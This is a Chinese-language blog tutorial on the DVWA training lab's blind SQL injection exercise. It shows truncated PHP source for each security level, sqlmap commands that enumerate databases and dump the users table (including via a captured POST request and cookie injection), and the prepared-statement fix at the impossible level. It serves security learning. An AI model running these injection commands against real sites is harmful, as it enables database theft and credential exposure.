往期博文:
DVWA靶场-Brute Force Source 暴力破解
DVWA靶场-Command Injection 命令注入
DVWA靶场-CSRF 跨站请求伪造
DVWA靶场-File Inclusion 文件包含
DVWA靶场-File Upload 文件上传
DVWA靶场-SQL Injection SQL注入
靶场环境搭建
https://github.com/ethicalhack3r/DVWA
[网络安全学习篇附]:DVWA 靶场搭建
目录
SQL Injection (Blind)
Low SQL Injection (Blind)
核心代码
Medium SQL Injection (Blind)
核心代码
High SQL Injection (Blind)
核心代码
Impossible SQL Injection (Blind)
核心代码
0 ) {
echo 'User ID exists in the database.
';
}
else {
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
echo 'User ID is MISSING from the database.
';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
由于sql 盲注比较浪费时间,笔者这里使用sqlmap 工具进行注入
列出当前数据库名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --current-db
列出表名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 --tables
获取users 表中数据
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" -D dvwa1 -T users --dump --batch
0 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
//mysql_close();
}
?>
可以很明显的看到,这里提交方式由原来的get 变为了post
使用bp 抓包,抓到post请求的数据包,将其保存至post.r 文件中
vim post.r
sqlmap -r post.r -D dvwa1 -T users --dump --batch
0 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// Might sleep a random amount
if( rand( 0, 5 ) == 3 ) {
sleep( rand( 2, 4 ) );
}
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
相较于前面两种,这里id 值由cookie 传递,设置了睡眠时间,增加了盲注的时间耗费
获取当前数据库名
sqlmap -u "http://192.168.1.200/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=1*; security=high; PHPSESSID=5c5k95olhvmj2q6k3d6fuu1995" --dbms=MySQL --technique=B --random-agent --flush-session -v 3 --current-db
至于用户名和密码,由于太浪费时间,笔者这里就不做赘述了
prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
$data->bindParam( ':id', $id, PDO::PARAM_INT );
$data->execute();
// Get results
if( $data->rowCount() == 1 ) {
// Feedback for end user
echo 'User ID exists in the database.
';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo 'User ID is MISSING from the database.
';
}
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>
可以看出,impossible prepare 和 PDO 防御SQL,注入,同时加入了token验证机制,进一步提高其安全性
https://www.sqlsec.com/2020/05/dvwa.html#toc-heading-31
https://www.freebuf.com/articles/web/119467.html